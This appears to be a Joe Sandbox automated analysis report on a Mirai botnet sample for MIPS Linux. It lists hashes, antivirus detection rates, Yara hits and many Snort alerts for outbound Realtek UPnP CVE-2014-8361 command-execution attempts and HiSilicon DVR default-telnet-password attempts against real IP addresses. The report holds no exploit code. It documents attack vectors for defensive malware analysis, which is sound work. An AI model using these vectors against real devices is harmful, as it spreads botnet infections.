Loading ...

Play interactive tourEdit tour

Linux Analysis Report w66OTKGVFv

Overview

General Information

Sample Name:w66OTKGVFv
Analysis ID:512845
MD5:392f09a2ade70a6281ed7919a9cf1ef0
SHA1:fe2543dea574c383d83e6f5c14a952cba5f7fba8
SHA256:f79a9bc14990a8a97de98c21adf4ad65c83aacc12718cb3a26a28f0fbdf54fd8
Tags:32elfmipsmirai
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Connects to many ports of the same IP (likely port scanning)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:512845
Start date:01.11.2021
Start time:13:24:13
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 2s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:w66OTKGVFv
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal80.troj.lin@0/0@0/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Process Tree

  • system is lnxubuntu20
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
w66OTKGVFvJoeSecurity_Mirai_8Yara detected MiraiJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5268.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5256.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5250.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            5292.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5276.1.0000000009e3a5dd.000000007387e1a1.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                Click to see the 3 entries

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for submitted fileShow sources
                Source: w66OTKGVFvVirustotal: Detection: 55%Perma Link
                Source: w66OTKGVFvReversingLabs: Detection: 51%

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33418 -> 45.43.234.253:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33418 -> 45.43.234.253:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49270 -> 185.131.79.102:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49270 -> 185.131.79.102:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49278 -> 185.131.79.102:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57866 -> 45.33.241.125:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57866 -> 45.33.241.125:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50794 -> 45.122.134.150:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50794 -> 45.122.134.150:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42126 -> 185.235.181.137:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42126 -> 185.235.181.137:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42128 -> 185.235.181.137:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33104 -> 45.113.160.194:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33104 -> 45.113.160.194:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33106 -> 45.113.160.194:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37690 -> 45.33.253.106:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37690 -> 45.33.253.106:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40002 -> 45.122.138.143:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40002 -> 45.122.138.143:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41432 -> 45.122.132.186:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41432 -> 45.122.132.186:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47268 -> 45.122.136.183:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47268 -> 45.122.136.183:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54588 -> 91.78.10.36:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54588 -> 91.78.10.36:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54592 -> 91.78.10.36:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 87.241.247.177:23 -> 192.168.2.23:57596
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60112 -> 45.116.212.156:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60112 -> 45.116.212.156:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45084 -> 45.42.90.213:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45084 -> 45.42.90.213:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58766 -> 45.33.245.100:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58766 -> 45.33.245.100:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33086 -> 91.79.26.179:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33086 -> 91.79.26.179:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45234 -> 45.41.86.222:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45234 -> 45.41.86.222:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33098 -> 91.79.26.179:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38650 -> 45.43.233.162:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38650 -> 45.43.233.162:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56294 -> 45.125.108.108:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56294 -> 45.125.108.108:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39452 -> 45.33.242.203:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39452 -> 45.33.242.203:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42844 -> 91.200.121.105:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42604 -> 45.158.23.172:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42604 -> 45.158.23.172:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55076 -> 45.33.241.233:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55076 -> 45.33.241.233:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57766 -> 45.126.231.213:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57766 -> 45.126.231.213:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60952 -> 45.42.86.7:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60952 -> 45.42.86.7:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48660 -> 45.81.128.52:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48660 -> 45.81.128.52:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56666 -> 45.33.240.89:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56666 -> 45.33.240.89:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41702 -> 45.116.215.39:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41702 -> 45.116.215.39:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35934 -> 91.78.190.234:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35934 -> 91.78.190.234:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35936 -> 91.78.190.234:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54206 -> 45.121.57.106:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54206 -> 45.121.57.106:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48922 -> 45.127.161.198:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48922 -> 45.127.161.198:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39056 -> 45.41.80.122:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39056 -> 45.41.80.122:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 65.242.93.105:23 -> 192.168.2.23:37836
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58396 -> 45.41.82.115:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58396 -> 45.41.82.115:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44310 -> 185.245.0.37:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44310 -> 185.245.0.37:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35170 -> 91.77.203.110:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35170 -> 91.77.203.110:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35200 -> 91.77.203.110:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35706 -> 45.91.83.203:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35706 -> 45.91.83.203:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33784 -> 185.215.47.183:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33784 -> 185.215.47.183:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33794 -> 185.215.47.183:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40710 -> 45.125.108.234:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40710 -> 45.125.108.234:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50750 -> 45.42.86.111:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50750 -> 45.42.86.111:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51888 -> 45.33.243.253:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51888 -> 45.33.243.253:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 37.84.226.148:23 -> 192.168.2.23:55770
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 37.84.226.148:23 -> 192.168.2.23:55770
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:40226 -> 108.18.240.94:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59982 -> 185.235.182.146:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59982 -> 185.235.182.146:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60004 -> 185.235.182.146:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57002 -> 185.235.183.212:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57002 -> 185.235.183.212:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57006 -> 185.235.183.212:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34120 -> 45.60.186.204:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34120 -> 45.60.186.204:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34166 -> 45.60.186.204:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47454 -> 45.254.26.133:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47454 -> 45.254.26.133:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32984 -> 45.120.184.165:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:32984 -> 45.120.184.165:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36356 -> 45.43.225.135:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36356 -> 45.43.225.135:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32996 -> 45.120.184.165:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57520 -> 45.123.199.139:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57520 -> 45.123.199.139:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60370 -> 45.207.63.12:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60370 -> 45.207.63.12:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49902 -> 185.182.49.206:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49902 -> 185.182.49.206:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49926 -> 185.182.49.206:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42800 -> 45.117.146.110:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42800 -> 45.117.146.110:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41240 -> 45.123.197.0:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41240 -> 45.123.197.0:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35058 -> 45.158.23.103:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35058 -> 45.158.23.103:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51376 -> 91.200.123.226:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.112.40.201:23 -> 192.168.2.23:51408
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.112.40.201:23 -> 192.168.2.23:51408
                Source: TrafficSnort IDS: 716 INFO TELNET access 182.52.108.215:23 -> 192.168.2.23:44936
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60558 -> 45.113.1.132:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60558 -> 45.113.1.132:52869
                Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60206 -> 116.97.240.187:23
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55414 -> 45.158.21.195:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55414 -> 45.158.21.195:52869
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 200.148.142.113:23 -> 192.168.2.23:59300
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 200.148.142.113:23 -> 192.168.2.23:59300
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39334 -> 45.121.82.130:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39334 -> 45.121.82.130:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38568 -> 45.126.231.227:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38568 -> 45.126.231.227:52869
                Source: TrafficSnort IDS: 716 INFO TELNET access 87.205.45.186:23 -> 192.168.2.23:44228
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49186 -> 45.33.252.54:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49186 -> 45.33.252.54:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50686 -> 45.126.228.243:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50686 -> 45.126.228.243:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37886 -> 45.42.82.52:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37886 -> 45.42.82.52:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47470 -> 91.76.203.52:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47470 -> 91.76.203.52:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47476 -> 91.76.203.52:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34570 -> 185.215.47.22:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34570 -> 185.215.47.22:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60218 -> 185.216.250.157:52869
                Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60218 -> 185.216.250.157:52869
                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58256 -> 45.195.155.84:52869
